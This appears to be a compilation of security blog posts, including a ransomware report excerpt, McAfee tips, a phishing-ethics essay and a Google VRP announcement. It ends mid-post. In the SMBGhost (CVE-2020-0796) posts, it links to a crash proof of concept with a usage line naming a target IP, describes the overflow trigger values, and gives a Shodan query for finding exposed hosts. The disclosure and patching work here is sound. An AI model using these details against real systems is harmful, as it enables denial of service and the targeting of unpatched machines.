This pattern suggests that for many organizations, if initial infections are detected, contained, and remediated quickly, the significant damage and cost associated with a ransomware infection could be avoided. In fact, in a handful of cases, Mandiant incident responders and FireEye Managed Defense contained and remediated malicious activity, likely preventing ransomware deployment. Several investigations discovered evidence of ransomware installed into victim environments but not yet successfully executed.


Figure 2: Days elapsed between initial access and ransomware deployment

Ransomware Deployed Most Often After Hours

In 76% of incidents we reviewed, ransomware was executed in victim environments after hours, that is, on a weekend or before 8:00 a.m. or after 6:00 p.m. on a weekday, using the time zone and customary work week of the victim organization (Figure 3 and Figure 4). This observation underscores that threat actors continue working even when most employees may not be.

Some attackers possibly intentionally deploy ransomware after hours, on weekends, or during holidays, to maximize the potential effectiveness of the operation on the assumption that any remediation efforts will be implemented more slowly than they would be during normal work hours. In other cases, attackers linked ransomware deployment to user actions. For example, in 2019 incidents at retail and professional services firms, attackers created an Active Directory Group Policy Object to trigger ransomware execution based on user log on and log off.


Figure 3: Ransomware execution frequently takes place after hours


Figure 4: Ransomware execution by hour of the day

Mitigation Recommendations

Organizations seeking to prevent or mitigate the effects of ransomware infections could consider the following steps. For more comprehensive recommendations for addressing ransomware, please refer to our blog post: Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment and the linked white paper.

Address Infection Vectors

  • Use enterprise network, email, and host-based security products with up-to-date detections to prevent and detect many common malware strains such as TRICKBOT, DRIDEX, and EMOTET.
  • Contain and remediate infections quickly to prevent attackers from conducting follow-on activity or selling access to other threat actors for further exploitation.
  • Perform regular network perimeter and firewall rule audits to identify any systems that have inadvertently been left accessible to the internet. Disable RDP and other protocols to systems where this access is not expressly required. Enable multi-factor authentication where possible, particularly to internet-accessible connections, see pages 4-15 of the white paper for more details.
  • Enforce multi-factor authentication, that is, where enabled, do not allow single factor authentication for users who have not set up the multi-factor mechanism.

Implement Best Practices

  • For example, carry out regular anti-phishing training for all employees that operate a device on the company network. Ensure employees are aware of threat, their role in preventing it, and the potential cost of a successful infection.
  • Implement network segmentation when possible to prevent a potential infection from spreading.
  • Create regular backups of critical data necessary to ensure business continuity and, if possible, store them offsite, as attackers often target backups.
  • Restrict Local Administrator accounts from specific log on types, see page 18 of the white paper for more details.
  • Use a solution such as LAPS to generate a unique Local Administrator password for each system.
  • Disallow cleartext passwords to be stored in memory in order to prevent Mimikatz credential harvesting, see p. 20 of the white paper for more details.
  • Consider cyber insurance that covers ransomware infection.

Establish Emergency Plans

  • Ensure that after-hours coverage is available to respond within a set time period in the case of an emergency.
  • Institute after-hours emergency escalation plans that include redundant means to contact multiple stakeholders within the organization and 24-hour emergency contact information for any relevant third-party vendors.

Outlook

Ransomware is disruptive and costly. Threat actor innovations have only increased the potential damage of ransomware infections in recent years, and this trend shows no sign of slowing down. We expect that financially motivated actors will continue to evolve their tactics to maximize profit generated from ransomware infections. We anticipate that post-compromise ransomware infections will continue to rise and that attackers will increasingly couple ransomware deployment with other tactics, such as data theft and extortion, increasing ransom demands, and targeting critical systems.

The good news is that particularly with post-compromise infections, there is often a window of time between the first malicious action and ransomware deployment. If network defenders can detect and remediate the initial compromise quickly, it is possible to avoid the significant damage and cost of a ransomware infection.

Register for our upcoming ransomware webinar to learn more.

Cybersecurity through openness: creating the right company culture

Interoperability and openness are concepts that have a tendency to turn technical quickly. But for McAfee, it goes beyond software. To stay cybersecure, organisations need to build in openness in their company structures, ensuring that different departments, from engineering, to legal, HR and business development teams all work together to protect the company and its assets.

At McAfee, we’ve embedded openness and interoperability both in how we develop our software and in the way the company works because it’s good for business. Increasingly we see that in a maturing cybersecurity protection market, companies need to break out of some of the silos they have built into their organisations, or risk exposing vulnerabilities to the ever-growing threat of cybercrime.

Business culture issues crop up too regularly to be ignored. Whether it’s a privacy officer locking down data that could prove critical to ensure a company’s cybersecurity, security officers failing to explain to other business units how to use a new piece of technology or software in a safe way, or business development executives cutting corners on security to drive down cost these all can leave an organisation exposed to malicious actors. Just as different pieces of software need to work alongside each other, different parts of the business need to work in lockstep to keep cybercriminals out.

Of course, the technical challenge remains. A recent paper from the Center for Strategic and International Studies (CSIS), a top-tier think-tank based in Washington D.C., put the challenge succinctly: “Instead of spending their time responding to threats,” the paper says, “cyber professionals are occupied with managing a complex web of products and services that was supposed to make their jobs easier.”

The proliferation of tools is never going to be solved entirely, but a common set of standards, protocols, taxonomies and foundational open-source software can help ensure that threat intelligence is classified in a common way, anomalies are communicated effectively, and responses are efficient and automatable.

Kent Landfield, our chief standards and technology policy strategist, explained how McAfee approaches interoperability at an event hosted by CSIS in February: “We’re not fighting over the plumbing, or the data communications, but over the real value of the product and what it is bringing to the market.”

In short, Cybersecurity vendors should compete on providing the best solutions, such as threat protection services, to their customers, not on who has the best messaging system or the least-incomplete set of threat-intelligence data.

Work is already being done to solve this issue, through the Open Cybersecurity Alliance, comprising some of the leading interoperability-friendly cybersecurity companies in the market, and information and security executives in companies can help in this effort by building in openness and interoperability into their buying decisions.

Technical and commercial interoperability among vendors is only one part of the solution. Companies need to also look into their own organisation and structure to make sure their security culture allows these tools to be as efficient in tackling cyber threats as possible.

The post Cybersecurity through openness: creating the right company culture appeared first on McAfee Blogs.

How McAfee is Hiring Top Talent During a Pandemic

As the world continues to address a rapidly evolving situation with the COVID-19 pandemic, it’s important more than ever for all of us to do our part to protect our families and communities.  

At McAfee, we play an important role in keeping the world safe from cyberthreats, and our mission to protect all that matters becomes heightened in times of uncertainty such as this. The well-being of our team members, their families and the communities in which we live, remains our top priority. With this in mind, we have and will continue to put stringent safety and precautionary measures in place across all sites globally. Simultaneously, we also know that our customers and partners depend on us to keep them safe too. Our adversaries in the world of cybersecurity aren’t slowing down; and neither will we.

Fortunately, we live in the age of technology where people can stay connected no matter our physical location. McAfee is still fervently hiring at this time and new team members continue to be onboarded. We continue to lean on tools such as virtual interviewing to attract top, diverse talent across the world. With that, I want to share how McAfee is recruiting when virtual interviewing is essential, along with three of my top tips to help candidates prepare for virtual interviews. 
 

1. Hone Your Virtual Interview Skills 

Like an in-person interview, preparation is key for virtual interviews to allow your full, authentic self to shine through. Eye contact, body language and listening is very important when you’re engaging in-person with someone, and as a candidate, you want to have that same connection during a virtual interview. So be sure to make eye contact, nod and leverage visual cues just as you would as if you were in-person.And of course much of the same rules apply for a virtual interview: always do your research beforehand, dress professionally, and be prepared to provide insightful takeaways and highlights that demonstrate you’re the best person for the role.

2. Set Up Ahead of Time

You also want to ensure your technology is ready—check your internet connection, computer audio, webcam and place your cell phone in silent mode. Close down any internet tabs or items that may be distraction – or worse, where an advert or background application may start playing. Make sure you’ve positioned the camera appropriately, your have a clear desk space, the room is well lit and that your background is neutral. It’s also worth having a digital copy of your resume or your portfolio to hand which you can easily email or share through the designated virtual technology you’re using. 

3. Prepare for the Unexpected 

With technology, there’s always a chance for something to go wrong. Before the interview, take time to exchange information with your recruiter in the event of technical difficulties and interruptions. Despite preparing, sometimes instances are out of our control—e.g. pets or children entering the room while you’re interviewing. We are all human beings with lives outside of work that shape who we are. In the event of a disruption, just ask for a few moments, step away and come back when the room is free of interruption again.  

As you seek career opportunities I hope these tips serve as helpful recommendations and ways to successfully land that ultimate dream job. McAfee is committed to providing the best possible candidate and onboarding experience during this unprecedented time and we look forward to e-meeting you where needed!

And if you’re looking to grow your career with a company that values diversity, and/or you’re simply interested to understand more about careers at McAfee, check out the McAfee careers site and available opportunities. 

The post How McAfee is Hiring Top Talent During a Pandemic appeared first on McAfee Blogs.

NIST Updates and Expands Its Flagship Catalog of Information System Safeguards

After your organization forms a general plan for tackling its cybersecurity and privacy risk management issues, it needs particular state-of-the-art tools to make that plan a reality. Computer security and privacy experts at the National Institute of Standards and Technology (NIST) have the answer with an updated toolbox of safeguards for protecting an organization’s operations and assets, as well as the personal privacy of individuals. NIST Draft Special Publication (SP) 800-53 Revision 5, Security and Privacy Controls for Information Systems and Organizations, is a collection of hundreds of

Vulnerability Reproduction: CVE-2020-0796 POC

Vulnerability Reproduction: CVE-2020-0796 POC

CVE-2020-0796 Introduction

Microsoft recently announced a bug in the compression mechanism of SMBv3.1.1. The bug is also known as “SMBGhost”. This bug has serious implications in managed networks. Windows 10 versions 1903 and 1909 are affected.

Lucas Georges shared an excellent write-up. Even though the full code wasn’t shared, the details were sufficient for a quick implementation.

In Lucas’ proof of concept, the vulnerability required username and password for the target machine, however we were able to implement a version that doesn’t require credentials by triggering the bug in an earlier stage. Following our implementation, we noticed that there’s another publicly available proof of concept code in Python with a similar technique.

Proof of Concept

This POC is released for Research and Academic purposes only. Use at your own risk.
POC source code (C#) is available at: https://github.com/ZecOps/CVE-2020-0796-POC.
Pre-compiled POC is available here: https://github.com/ZecOps/CVE-2020-0796-POC/releases/tag/2020-03-16
Usage: CVE-2020-0796-POC.exe [IP]
Example: CVE-2020-0796-POC.exe 192.168.1.5
Note: If [IP] is not provided, the POC will run on localhost (127.0.0.1)

Impact: This is a serious vulnerability that can be used to cause existing threat operators to spread laterally. Similar issues caused “NotPetya” and “WannaCry” ransomware. We recommend to treat this vulnerability seriously.

Remediation

  1. We recommend updating servers and endpoints to the latest Windows version to remediate this vulnerability. If possible, block port 445 until updates are deployed. Regardless of CVE-2020-0796, we recommend enabling host-isolation where possible. 
  2. It is possible to disable SMBv3.1.1 compression in order to avoid triggers to this bug, however we recommend to do full update instead if possible.

ZecOps Customers & Partners

ZecOps Digital Forensics and Incident Response (DFIR) customers can detect such exploitation attempts as “CVE-2020-0796” using ZecOps agentless solution: Neutrino for Servers and Endpoints. To try ZecOps technology and see a demo, you can contact us here.

Stay safe,
ZecOps Research Team.

References

WhatsApp Security Hacks: Are Your ‘Private’ Messages Really Ever Private?

WhatsApp hacks

WhatsApp one of the largest instant messengers and considered by many a social network of its own. So, in continuing our app safety discussion, we’re diving into some of the top security hacks and questions many WhatsApp app users and parents may have.

But first, what’s a security hack? In short, it’s an attempt to exploit the weaknesses in an app, network, or digital service to gain unauthorized access, usually for some illicit purpose. Here are just some of the concerns WhatsApp users may have and some suggestions on boosting security.

WhatsApp Hack FAQ

Are WhatsApp conversations private?

Yes — but there are exceptions. More than any other app, WhatsApp offers greater privacy thanks to end-to-end encryption that scrambles messages to ensure only you and the person you’re communicating with can read your messages or listen to your calls. Here’s the catch: WhatsApp messages (which include videos and photos) are vulnerable before they are encrypted and after they are decrypted if a hacker has managed to drop spyware on the phone. Spyware attacks on WhatsApp have already occurred. Safe Family Tip: No conversation shared between devices is ever 100% private. To increase your WhatsApp security, keep sensitive conversations and content offline, and keep your app updated. 

Can anyone read my deleted WhatsApp messages?

A WhatsApp user can access his or her own deleted messages via the chat backup function that automatically backs up all of your messages at 2 a.m. every day. WhatsApp users can delete a message by using the Delete for Everyone button within an hour after sending though it’s not foolproof. Here’s the catch: Anyone who receives the message before it’s deleted can take a screenshot of it. So, there’s no way to ensure regrettable content isn’t captured, archived, or shared. There are also third-party apps that will recall deleted messages shared by others. Another possibility is that a hacker can access old chats stored in an app user’s cloud. Safe Family Tip: Think carefully about sharing messages or content you may regret later.

Can WhatsApp messages be deleted permanently?

Even if a WhatsApp user decides to delete a message, it’s no guarantee of privacy since conversations are two-way, and the person on the receiving end may screenshot or save a copy of a chat, video, or photo. On the security side, you may delete a message and see it disappear, but WhatsApp still retains a “forensic trace of the chat” that can be used by hackers for mining data, according to reports. Safe Family Tip: For extra security, turn off backups in WhatsApp’s Settings.

WhatsApp hacksHow can I secure my WhatsApp?

It’s crucial when using WhatsApp (or any other app) to be aware of common scams, including malware, catfishing, job and money scams, spyware, and file jacking. To amplify security, turn on Security Notifications in Settings, which will send an alert if, for some reason, your security code changes. Other ways to boost security: Use two-step verification, never share your 6-digit SMS verification code, disable cloud back up, and set your profile to private. Safe Family Tip: Install comprehensive family security software and secure physical access to your phone or laptop with a facial, fingerprint, or a passcode ID. Don’t open (block, report) messages from strangers or spammers. Never share personal information with people you don’t know. 

How do I delete my WhatsApp account from another phone?

To delete a WhatsApp account go to > Settings > Account > Delete My Account. Deleting your account erases message history, removes you from groups, and deletes your backup data. According to WhatsApp, for users moving from one type of phone to another, such as from an iPhone to an Android, and keeping the same phone number, your account information stays intact, but you won’t be able to migrate messages across platforms. If you’re not keeping your number, you should delete WhatsApp from your old phone, download WhatsApp to your new phone, and verify your new phone number. Upgrading the same phone type will likely include options to migrate messages. Safe Family Tip: Before you give away or exchange an old phone, wipe it clean of all your data.

How do you know your WhatsApp is scanned?

WhatsApp users can easily sync devices by downloading the WhatsApp web app and activating it (Settings > WhatsApp Web/Desktop). Devices sync by scanning a QR code that appears on your laptop screen. You know your device is scanned when you see the green chat screen appear on your desktop. Safe Family Tip: It’s possible for a person with physical access to your desktop to scan your QR code and to gain account access. If you think someone has access to your account log out of all your active web sessions in WhatsApp on your mobile phone.

How long are WhatsApp messages stored?

According to WhatsApp, once a user’s messages are delivered, they are deleted from WhatsApp servers. This includes chats, photos, videos, voice messages, and files. Messages can still be stored on each individual’s device. Safe Family Tip: The moment you send any content online, it’s out of your control. The person or group on the receiving end can still store it on their device or to their cloud service. Never send risky content. 

How secure is WhatsApp?

There’s no doubt, end-to-end encryption makes it much more difficult for hackers to read WhatsApp messages. While WhatsApp is more secure than other messaging apps — but not 100% secure.

Is it true that WhatsApp has been hacked?

Yes. Several times and in various ways. No app, service, or network has proven to be unhackable. Safe Family Tip: Assume that any digital platform is vulnerable. Maximize privacy settings, never share risky content, financial information, or personal data.

Is WhatsApp safe to send pictures?

Encryption ensures that a transmission is secure, but that doesn’t mean WhatsApp content is safe or that human behavior is predictable. People (even trusted friends) can share private content. People can also illegally attempt to gain access to any content you’ve shared. This makes WhatsApp (along with other digital sharing channels) unsafe for exchanging sensitive information or photos. Safe Family Tip: Nothing on the internet is private. Never send or receive pictures that may jeopardize your privacy, reputation, or digital footprint.

WhatsApp isn’t the only popular app with security loopholes hackers exploit. Every app or network connected to the internet is at risk for some type of cyberattack. We hope this post sparks family discussions that help your kids use this and other apps wisely and helps keep your family’s privacy and safety online top of mind.

The post WhatsApp Security Hacks: Are Your ‘Private’ Messages Really Ever Private? appeared first on McAfee Blogs.

Impact Analysis Tool for Interdependent Cyber Supply Chain Risks: Draft NISTIR 8272 Available for Comment

NIST requests comments on Draft NISTIR 8272, Impact Analysis Tool for Interdependent Cyber Supply Chain Risks, which describes a prototype tool developed to show a possible solution for filling the gap between an organization's risk appetite and supply chain risk posture by providing a basic measurement of the potential impact of a cyber supply chain event. This tool does not represent a complete supply chain risk management solution, but is intended to be integrated into or used in concert with tools such as third-party management, enterprise resource planning, and supply chain management

7 key findings from Cisco’s CISO benchmark study

Propelling digital transformation while safeguarding the enterprise is mammoth task. Indeed, initiatives like opening up IT infrastructure, converging IT and OT networks, and allowing partners and customers to closely interact with the organization to embrace new business models and collaboration (think cloud applications, APIs, sensors, mobile devices, etc.) bring new risks as well as opportunities.

For its 2020 CISO Benchmark Report, Cisco surveyed 2,800 IT decision makers from 13 countries to better understand the challenges security teams face. Here are some of the key findings that stood out to me.

To read this article in full, please click here

(Insider Story)

SMBGhost – Analysis of CVE-2020-0796

The Vulnerability

The latest vulnerability in SMBv3 is a “wormable” vulnerability given its potential ability to replicate or spread over network shares using the latest version of the protocol (SMB 3.1.1). As of this writing, Microsoft have just released a patch for CVE-2020-0796 on the morning of March 12th. The bug was introduced very recently, in the decompression routines for SMBv3 data payloads. The code implementing this was deployed in April 2019 for Version 1903 and November 2019 for version 1909.

The vulnerability occurs during the processing of a malformed compressed message. The header of the message follows this format: (from [MS-SMB2])

  • There are two parameters in the header that are of interest: OriginalCompressedSegmentSize and Offset/Length
  • The Srv2DecompressData (srv2.sys) function allocates a buffer of size OriginalCompressedSegmentSize + Offset/Length
  • This is not checking the signedness of these values, and as the addition is signed an attacker can allocate a buffer smaller than intended
  • Data is being decompressed at buffer + offset, using data from packet+0x10+offset
  • OriginalCompressedSegmentSize is used as the UncompressedBufferSize parameter passed to SmbCompressionDecompression which is a wrapper for RtlDecompressBufferEx2
  • This routine assumes the uncompressed buffer size to be an unsigned long so a negative value gets cast into a large unsigned number
  • Because of this, the decompression routine decompresses the buffer and can go well beyond the original size, as it is assuming it has a very large buffer to work with

Here’s an annotated disassembly of the relevant function on the server side:

This flaw can affect both client and server in SMB negotiations in a compressed message sent after the Negotiate Protocol Responses. The server vulnerability is within srv2.sys and the client vulnerability is within mrxsmb.sys which both end up calling the same code in SmbCompressDecompress.

Here’s an annotated disassembly of the relevant function on the client side – unlike the server side the OriginalCompressedSegmentSize is bounds checked but there is no check on offset/length before they are combined and passed to ExAllocatePoolWithtag. We have confirmed the BSOD crash from both client->server AND server-client using this vulnerability.

If a computer allows inbound SMB3 traffic over port 445, by default compression is supported and the client and server will negotiate the “terms” of this compression and then the client will proceed to transfer a compressed payload.

The flaw is present in the SMB Compression Transform Header, prior to any kind of authentication.

We can see the very large OriginalSize used for attacker-controlled data (4294967295 is 0xFFFFFFFF in hex which is also -1 if viewed as a signed long). This is copied into a smaller fixed buffer and results in a classic buffer overflow. Of note is the ProtocolID of \xfcSMB, which must be present and represents the magic bytes used to indicate the message must be decompressed per the spec.

However, it is not just the server-side which is vulnerable to this attack. If a client connects to a malicious SMB server, both sides run the same vulnerable code and a malicious server can respond to client requests in the same way to trigger the overflow on the initiator/client side. In this scenario, the Windows Powershell command referenced here will not be effective in stopping this attack against the SMB client. It will only be useful when implemented on the SMB server/recipient side pre-authentication.

Exposure

As always, this kind of patch should be applied as soon as possible, subject to organizational policy. While there are currently no known exploits in the wild, as you will see, causing a BSOD (blue screen of death), is quite trivial, and remains a highly effective attack method for disruption if an attacker can gain access to an internal network.

More dangerous yet are any systems exposing port 445 to the Internet, as we have seen the damage possible through similar bugs such as WannaCry. As of the time of this writing and just prior to Microsoft releasing its patch, Shodan.io appears to have just over 35,000 Windows computers reporting the vulnerable versions of software as searched by: port:445 os: “Windows” + os: “18362” for example. Many of these will likely be patched quickly now that a fix is out.

Patch Analysis

Looking at the patched version, we can see the code is now using RtlULongAdd to add  OriginalCompressedSegmentSize and the Offset/Length value. There also seem to be an extra test to make sure the size is not bigger than the whole packet plus 0x134.

Looking a little further, we can also see the usage of RtULongSub for computing the size of the compressed buffer while accounting for the offset field.

Finally, we can also notice the usage of WPP tracing code in case an error occurs (tracing was already occurring throughout the driver, but this specific function was not previously instrumented in such a way).

Impact – BSOD vs. RCE

Getting a Blue Screen of Death or BSOD is a straightforward exercise. Pivoting from that to full remote code execution will likely be more challenging, as additional bugs will likely be required to bypass Windows’ latest mitigation techniques, such as Kernel ASLR or KASLR. For this bug, the attacker will have easy primitives for the allocation of data and can control the size of the data used to trigger the overflow. On the flip side, the objects allocated in memory to store the attacker input are freed relatively quickly, making exploitation more difficult.

Product Detection/Mitigation

McAfee has released NSP ID 0x43c0e600 – NETBIOS-SS: Samba Remote Code Execution Vulnerability (CVE-2020-0796) to address exploitation of the vulnerability. We are working on developing additional signatures to complement or replace this coverage.

 

The post SMBGhost – Analysis of CVE-2020-0796 appeared first on McAfee Blogs.

Working From Home? 5 Tips to Stay Secure

According to OWL Labs, 52% of the employees work from home (WFH) at least one day a week. In the U.S., 4.7 million employees now work from home more than half the time, with the work-from-home population growing by 173% since 2005.

Working from home – a new reality

It’s evident that working from home has become a new reality for many, as more and more companies are encouraging and even requesting that their staff work remotely. In fact, recent events have accelerated this WFH trend, or workforce transformation process, with companies restricting employee travel and many allocating more resources to enable virtual work. Major tech players, like Twitter and LinkedIn, have made even bigger moves by implementing policies that require all employees to work from home. Clearly, work from home is no longer just an initiative to harness global talent but also a way to protect workers from risk.

Increased security risks

At McAfee, we’re keeping a close eye on this trend, observing huge increases in the number of personal devices connecting online. And while working from home offers benefits to employees, this upswing in personal devices connecting to enterprises can actually expose organizations and employees to security risks, such as malware attacks, identity theft, and ransomware. With the world now facing this new reality, the question remains–how can employers and employees equip themselves with the resources to work from home securely on a full-time or part-time basis?

Work from home securely

Employers must not only educate their employees on digital security best practices but also give them the tools to combat online threats that may stem from remote work. With many of us relying on emails and the web to work remotely, we need to be aware of the key giveaway signs that indicate a threat. From there, we can spot, flag, and report anything that looks suspicious. By sharing the responsibility and encouraging others to flag anything sketchy, we can all naturally raise awareness and help others avoid falling into similar traps. By staying open with one another, we can stay ahead of hackers.

Tips to protect both personal and corporate data

Want to ensure you work from home in a safe and secure way? Here are a five quick tips and tools you can use to protect both personal and corporate data:

Utilize a VPN

Many people use public Wi-Fi at coffee shops, airports, etc. in order to stay connected both professionally and personally. However, by using an unsecured Wi-Fi connection, you may be creating an easy gateway for hackers to access your personal information and data. Be sure to use a virtual private network (VPN), which is extremely important for establishing a secured connection to work files and personal photos saved in the cloud.

Be aware of phishing emails

We’ve seen hackers attempt to take advantage of people’s fears by pretending to sell face masks online to trick unsuspecting people into giving away their credit card details. Do not open any email attachments or click on any links that seem suspicious.

Regularly change cloud passwords with two-factor authentication

Two-factor authentication is a more secure way to access work applications. In addition to a password/username combo, you will be asked to verify who you are with a device that you–and only you—own, such as a mobile phone. Put simply: it uses two factors to confirm an identity. Ultimately, getting access to something supposedly confidential isn’t that hard for hackers nowadays. However, a second form of identification makes it so hackers are limited in what they can pull off.

Use strong, unique passwords

In the chance a hacker does gain access to one of your accounts, make sure to use complex passwords for each of your accounts, and never reuse your credentials across different platforms. It’s also a good idea to update your passwords consistently to further protect your data. You can also use a password manager, or a security solution that includes a password manager, to keep track of all your unique passwords.

Browse with security protection

Ensure that you continue to update your security solutions across all devices. This will help protect devices against malware, phishing attacks, and other threats, as well as help identify malicious websites while browsing.

Stay up-to-date

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Working From Home? 5 Tips to Stay Secure appeared first on McAfee Blogs.

AppSec Analytics and Reporting Tools Give You the Edge of Insight

As DevSecOps takes hold, more developers are taking on security-minded responsibilities. Instituting strong AppSec governance with policies backed by analytics and reporting enables developers to focus on real-world problems and deliver secure code ahead of schedule.

It???s all in the numbers. When development and security teams invest in the right tools to speed up their processes and improve their AppSec, data and insights only help demonstrate success to management while also proving compliance with clear reporting on defined criteria. That???s where the right solutions with proof-positive results come into play.

Merge inputs and manage expectations with metrics

Durable governance frameworks make all the difference when it comes to streamlining and consolidating AppSec efforts for multiple teams. They incorporate input from numerous stakeholders and sources to best address the practical needs and requirements of the AppSec program. Not only does this ensure that everyone is on the same page for hitting goals and desired outcomes, but if done correctly, it places the focus on security as a group effort rather than individual, siloed teams.ツ?ツ? ツ?ツ?

Leaning on metrics, organizations can better manage their departments and programs by gaining visibility into what works and what doesn???t work, where efforts need to scale up or down, and how to best achieve the goals they set with defined policies in mind. This way, developers know exactly which issues require attention and which ones are not mission-critical to hitting deployment dates.

Optimize efforts through data-driven visions

Without the right data on-hand to optimize efforts in a meaningful way, it can be difficult to guide developers and make the best decisions about future investments. Veracode Analytics makes it easier for organizations to mature their programs with insights into the best ways to scale efforts and hit AppSec goals. Analytics pave the way to ensure that resources are used in the most cost-efficient ways by weighing remediation against mitigation so that teams can make vital decisions about developer skills and where there may be gaps in training.

Additionally, data-driven insights help businesses decide which tools and solutions are best for their needs. Analytics can simplify the creation of SLAs and policy rules, too, defining when developers should scan and how quickly they should remediate vulnerabilities. By shining a light on gaps in training and skills, analytics help ensure that development teams have everything they need to find and address issues without halting production.

Demonstrate success and prove compliance

When unable to demonstrate success, any dedicated AppSec program is at risk of failure. Analytics, metrics, and policy reporting provide the insight organizations must have to show proof-positive progress and give stakeholders the confidence they need for decision-making and budget setting. Dashboards and data visualizations in Veracode Analytics make the information easy to consume, with trackable metrics that prove compliance, show flaw rates, highlight fix rates, and give companies the edge for achieving business goals.

Now more than ever, regulations around software security are essential to complying with government guidelines and customer requirements. Inclusive results from penetration testing, coupled with automated scans, can help meet compliance regulations like GDPR (Article 32), PCI DSS (Requirement 11.3), Sarbanes-Oxley, HIPAA, and regional laws that impact businesses locally. ツ?

Organizations have the ability to leverage data from Static Analysis, Dynamic Analysis, Penetration Testing, and Software Composition Analysis in one dashboard or report.

Data compiled from customized or standard policy reports is easily reported directly into an organization???s governance, risk, and compliance (GRC) system too, ensuring that each stakeholder and decision-maker has the information they need to guide future AppSec decisions.

Gain the edge of insight

When it comes to facing and fine-tuning old AppSec governance policies that must accommodate modern security needs, organizations should adjust course with analytics, metrics, and policies that help developers deliver better code.

Veracode AppSec Governance solutions are built to enhance programs when it???s time to realign. Get in touch to learn more about Veracode???s solutions.

COVID-19 Phishing Tests: WRONG

Malware Jake Tweeted a poll last night which asked the following:

"I have an interesting ethical quandary. Is it ethically okay to use COVID-19 themed phishing emails for assessments and user awareness training right now? Please read the thread before responding and RT for visibility. 1/"

Ultimately he decided:

"My gut feeling is to not use COVID-19 themed emails in assessments/training, but to TELL users to expect them, though I understand even that might discourage consumption of legitimate information, endangering public health. 6/"

I responded by saying this was the right answer.

Thankfully there were many people who agreed, despite the fact that voting itself was skewed towards the "yes" answer.

There were an uncomfortable number of responses to the Tweet that said there's nothing wrong with red teams phishing users with COVID-19 emails. For example:

"Do criminals abide by ethics? Nope. Neither should testing."

"Yes. If it's in scope for the badguys [sic], it's in scope for you."

"Attackers will use it. So I think it is fair game."

Those are the wrong answers. As a few others outlined well in their responses, the fact that a criminal or intruder employs a tactic does not mean that it's appropriate for an offensive security team to use it too.

I could imagine several COVID-19 phishing lures that could target school districts and probably cause high double-digit click-through rates. What's the point of that? For a "community" that supposedly considers fear, uncertainty, and doubt (FUD) to be anathema, why introduce FUD via a phishing test?

I've grown increasingly concerned over the past few years that there's a "cult of the offensive" that justifies its activities with the rationale that "intruders do it, so we should too." This is directly observable in the replies to Jake's Tweet. It's a thin veneer that covers bad behavior, outweighing the small benefit accrued to high-end, 1% security shops against the massive costs suffered by the vast majority of networked global organizations.

The is a selfish, insular mindset that is reinforced by the echo chamber of the so-called "infosec community." This "tribe" is detached from the concerns and ethics of the larger society. It tells itself that what it is doing is right, oblivious or unconcerned with the costs imposed on the organizations they are supposedly "protecting" with their backwards actions.

We need people with feet in both worlds to tell this group that their approach is not welcome in the broader human community, because the costs it imposes vastly outweigh the benefits.

I've written here about ethics before, usually in connection with the only real value I saw in the CISSP -- its code of ethics. Reviewing the "code," as it appears now, shows the following:

"There are only four mandatory canons in the Code. By necessity, such high-level guidance is not intended to be a substitute for the ethical judgment of the professional.

Code of Ethics Preamble:

The safety and welfare of society and the common good, duty to our principals, and to each other, requires that we adhere, and be seen to adhere, to the highest ethical standards of behavior.
Therefore, strict adherence to this Code is a condition of certification.

Code of Ethics Canons:

Protect society, the common good, necessary public trust and confidence, and the infrastructure.
Act honorably, honestly, justly, responsibly, and legally.
Provide diligent and competent service to principals.
Advance and protect the profession."

This is almost worthless. The only actionable item in the "code" is the word "legally," implying that if a CISSP holder was convicted of a crime, he or she could lose their certification. Everything else is subject to interpretation.

Contrast that with the USAFA Code of Conduct:

"We will not lie, steal, or cheat, nor tolerate among us anyone who does."

While it still requires an Honor Board to determine if a cadet has lied, stolen, cheated, or tolerated, there's much less gray in this statement of the Academy's ethics. Is it perfect? No. Is it more actionable than the CISSP's version? Absolutely.

I don't have "solutions" to the ethical bankruptcy manifesting in some people practicing what they consider to be "information security." However, this post is a step towards creating red lines that those who are not already hardened in their ways can observe and integrate.

Perhaps at some point we will have an actionable code of ethics that helps newcomers to the field understand how to properly act for the benefit of the human community.

Start Stretching for March Hackness

As the days get warmer, the sun sets later, and birds chirp louder, the Security Innovation team has one more right of spring to get excited about - March Hackness!

This year’s event is going to focus on one of the essential factors for rapidly growing cybersecurity skillsets - new users. To encourage the curiosity that helps build skills, our team will roll out even more resources than in the past to help ethical hackers of the future ramp up more quickly:

Announcing our first GCP VRP Prize winner and updates to 2020 program




Last year, we announced a yearly Google Cloud Platform (GCP) VRP Prize to promote security research of GCP. Since then, we’ve received many interesting entries as part of this new initiative from the security research community. Today, we are announcing the winner as well as several updates to our program for 2020.

After careful evaluation of all the submissions, we are excited to announce our winner of the 2019 GCP VRP prize: Wouter ter Maat, who submitted a write-up about Google Cloud Shell vulnerabilities. You can read his winning write-up here.

There were several other excellent reports submitted to our GCP VRP in 2019. To learn more about them watch this video by LiveOverflow, which explains some of the top submissions in detail.

To encourage more security researchers to look for vulnerabilities in GCP and to better reward our top bug hunters, we're tripling the total amount of the GCP VRP Prize this year. We will pay out a total of $313,337 for the top vulnerability reports in GCP products submitted in 2020. The following prize amounts will be distributed between the top 6 submissions:
  • 1st prize: $133,337
  • 2nd prize: $73,331
  • 3rd prize: $73,331
  • 4th prize: $31,337
  • 5th prize: $1,001
  • 6th prize: $1,000

Like last year, submissions should have public write-ups in order to be eligible for the prize. The number of vulnerability reports in a single write-up is not a factor. You can even make multiple submissions, one for each write-up. These prizes are only for vulnerabilities found in GCP products. If you have budget constraints regarding access to testing environments, you can use the free tier of GCP. Note that this prize is not a replacement of our Vulnerability Reward Program (VRP), and that we will continue to pay security researchers under the VRP for disclosing security issues that affect Google services, including GCP. Complete details, terms and conditions about the prize can be found here.


Thank you to everyone who submitted entries in 2019! Make sure to nominate your VRP reports and write-ups for the 2020 GCP VRP prize here before December 31, 2020 at 11:59 GMT.

How Google Play Protect kept users safe in 2019


Through 2019, Google Play Protect continued to improve the security for 2.5 billion Android devices. Built into Android, Play Protect scans over 100 billion apps every day for malware and other harmful apps. This past year, Play Protect prevented over 1.9 billion malware installs from unknown sources. Throughout 2019 there were many improvements made to Play Protect to bring the best of Google to Android devices to keep users safe. Some of the new features launched in 2019 include:
Advanced similarity detection
Play Protect now warns you about variations of known malware right on the device. On-device protections warn users about Potentially Harmful Apps (PHAs) at install time for a faster response. Since October 2019, Play Protect issued 380,000 warnings for install attempts using this system.
Warnings for apps targeting lower Android versions
